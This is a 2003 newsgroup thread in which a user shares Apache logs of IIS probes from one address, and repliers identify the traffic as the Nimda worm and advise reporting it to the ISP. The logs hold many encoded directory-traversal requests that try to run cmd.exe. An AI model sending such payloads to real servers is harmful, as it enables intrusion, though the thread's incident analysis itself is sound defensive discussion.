Hack attempt on Apache inst't it ?

Greetings,

I thought I could have a look at my logs and found the following :

Seems my visitor thought he was attacking IIS.
I'd like to have some fun :

How can I know which provider gives which span of ip ?
how could I setup my iptables to log these attempts to another file
where, for instance, a daemon could try a reverse dns with the ip and
save the data.

Provider + ip + date, if the ip is not spoofed -> funny report isn't it ?

Your comments are most welcome since I'm keen on networks but not
skilled yet (hey, with time and dedication )

80.11.161.201 - - [04/Dec/2003:18:09:29 +0100] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
80.11.161.201 - - [04/Dec/2003:18:09:31 +0100] "GET
/MSADC/root.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
80.11.161.201 - - [04/Dec/2003:18:09:32 +0100] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
80.11.161.201 - - [04/Dec/2003:18:09:33 +0100] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
80.11.161.201 - - [04/Dec/2003:18:09:34 +0100] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
80.11.161.201 - - [04/Dec/2003:18:09:35 +0100] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 1034 "-" "-"
80.11.161.201 - - [04/Dec/2003:18:09:36 +0100] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 1034 "-" "-"
80.11.161.201 - - [04/Dec/2003:18:09:37 +0100] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0"
404 1034 "-" "-"
80.11.161.201 - - [04/Dec/2003:18:09:39 +0100] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
80.11.161.201 - - [04/Dec/2003:18:09:39 +0100] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
80.11.161.201 - - [04/Dec/2003:18:09:40 +0100] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
80.11.161.201 - - [04/Dec/2003:18:09:42 +0100] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
80.11.161.201 - - [04/Dec/2003:18:09:42 +0100] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 967 "-" "-"
80.11.161.201 - - [04/Dec/2003:18:09:43 +0100] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 967 "-" "-"
80.11.161.201 - - [04/Dec/2003:18:09:44 +0100] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
"-" "-"
80.11.161.201 - - [04/Dec/2003:18:09:45 +0100] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"

charly <(E-Mail Removed)> wrote:
> Greetings,

> I thought I could have a look at my logs and found the following :

> Seems my visitor thought he was attacking IIS.
> I'd like to have some fun :

Pretty lame.


> How can I know which provider gives which span of ip ?

inetnum: 80.11.161.0 - 80.11.161.255
netname: IP2000-ADSL-BAS
descr: BSREI105 Reims Bloc2
country: FR
admin-c: WITR1-RIPE
tech-c: WITR1-RIPE
status: ASSIGNED PA
remarks: for hacking, spamming or security problems send
mail to
remarks: (E-Mail Removed) AND (E-Mail Removed)
[..]

Hint:
man whois

--
Michael Heiming

Remove +SIGNS and www. if you expect an answer, sorry for
inconvenience, but I get tons of SPAM

Thank you

I knew about whois but it didn't work when I tried : strange

Anyway, I consider it as an opportuniy to study things about networks

Question :

Given :
an ip adress,
it's alive when I spot it,
it's not a proxy,

what can I do excepted a whois ?

Maybe I should swap to c.o.l.networking (tell me, I don't want to bother
you )

thanks

> Seems my visitor thought he was attacking IIS.
> I'd like to have some fun :

> 80.11.161.201 - - [04/Dec/2003:18:09:29 +0100] "GET
> /scripts/root.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"

Well this is now in the category of classic junk MS traffic, this crap has
been floating around the Internet for years. It comes from hacked Windows
servers that are automatically looking for other Windows servers to hack
(no shortage of these around).

The owner of this IP is probably 100% oblivious to the behaviour of his
host. If you want to take the effort, you can contact the ISP of the owner
using the Whois tool at http://openrbl.org/

--
Jem Berkes
http://www.sysdesign.ca/

charly wrote:

> Greetings,
>
> I thought I could have a look at my logs and found the following :
>
> Seems my visitor thought he was attacking IIS.
> I'd like to have some fun :
>
> How can I know which provider gives which span of ip ?
> how could I setup my iptables to log these attempts to another file
> where, for instance, a daemon could try a reverse dns with the ip and
> save the data.
>
> Provider + ip + date, if the ip is not spoofed -> funny report isn't it ?
>
> Your comments are most welcome since I'm keen on networks but not
> skilled yet (hey, with time and dedication )
>
> 80.11.161.201 - - [04/Dec/2003:18:09:29 +0100] "GET
> /scripts/root.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
> 80.11.161.201 - - [04/Dec/2003:18:09:31 +0100] "GET
> /MSADC/root.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
> 80.11.161.201 - - [04/Dec/2003:18:09:32 +0100] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
> 80.11.161.201 - - [04/Dec/2003:18:09:33 +0100] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
> 80.11.161.201 - - [04/Dec/2003:18:09:34 +0100] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-"
> "-" 80.11.161.201 - - [04/Dec/2003:18:09:35 +0100] "GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 1034 "-" "-"
> 80.11.161.201 - - [04/Dec/2003:18:09:36 +0100] "GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 1034 "-" "-"
> 80.11.161.201 - - [04/Dec/2003:18:09:37 +0100] "GET
>
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0"
> 404 1034 "-" "-"
> 80.11.161.201 - - [04/Dec/2003:18:09:39 +0100] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-"
> "-" 80.11.161.201 - - [04/Dec/2003:18:09:39 +0100] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-"
> "-" 80.11.161.201 - - [04/Dec/2003:18:09:40 +0100] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-"
> "-" 80.11.161.201 - - [04/Dec/2003:18:09:42 +0100] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-"
> "-" 80.11.161.201 - - [04/Dec/2003:18:09:42 +0100] "GET
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 967 "-"
> "-" 80.11.161.201 - - [04/Dec/2003:18:09:43 +0100] "GET
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 967 "-" "-"
> 80.11.161.201 - - [04/Dec/2003:18:09:44 +0100] "GET
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
> "-" "-"
> 80.11.161.201 - - [04/Dec/2003:18:09:45 +0100] "GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-"
> "-"
Its the nimda worm, report the IP's to whoever the ISP is that owns the
block.
# host 80.11.161.201
201.161.11.80.in-addr.arpa domain name pointer
AReims-105-1-7-201.w80-11.abo.wanadoo.fr.
or
# nslookup -silent 80.11.161.201
;; Got SERVFAIL reply from 127.0.0.1, trying next server
Server: 207.217.77.82
Address: 207.217.77.82#53

Non-authoritative answer:
201.161.11.80.in-addr.arpa name =
AReims-105-1-7-201.w80-11.abo.wanadoo.fr.

Authoritative answers can be found from:
161.11.80.in-addr.arpa nameserver = ns2.wanadoo.fr.
161.11.80.in-addr.arpa nameserver = ns.wanadoo.fr.
ns2.wanadoo.fr internet address = 193.252.19.11

Eric

charly <(E-Mail Removed)> wrote:
[..]
> Given :
> an ip adress,
> it's alive when I spot it,
> it's not a proxy,

> what can I do excepted a whois ?

Depends on the (if any) firewalls between you and the target
system, the question is what do you want to do and why?

--
Michael Heiming

Remove +SIGNS and www. if you expect an answer, sorry for
inconvenience, but I get tons of SPAM

On 2003-12-15, charly <(E-Mail Removed)> wrote:

> I thought I could have a look at my logs and found the following :
>
> Seems my visitor thought he was attacking IIS.
> I'd like to have some fun :
>
> How can I know which provider gives which span of ip ?
> how could I setup my iptables to log these attempts to another file
> where, for instance, a daemon could try a reverse dns with the ip and
> save the data.
>
> Provider + ip + date, if the ip is not spoofed -> funny report isn't it ?
>
> Your comments are most welcome since I'm keen on networks but not
> skilled yet (hey, with time and dedication )
>
> 80.11.161.201 - - [04/Dec/2003:18:09:29 +0100] "GET
> /scripts/root.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
> 80.11.161.201 - - [04/Dec/2003:18:09:31 +0100] "GET
> /MSADC/root.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
> 80.11.161.201 - - [04/Dec/2003:18:09:32 +0100] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
> 80.11.161.201 - - [04/Dec/2003:18:09:33 +0100] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
> 80.11.161.201 - - [04/Dec/2003:18:09:34 +0100] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
> 80.11.161.201 - - [04/Dec/2003:18:09:35 +0100] "GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir

[clip...]

That's the nimda worm. The machine on the other end is infected, even
though there's been a patch to prevent this available for over 2 years
now:

http://www.cert.org/advisories/CA-2001-26.html

There ought to be a way to take machines like that clean off the 'net.

--

-John ((E-Mail Removed))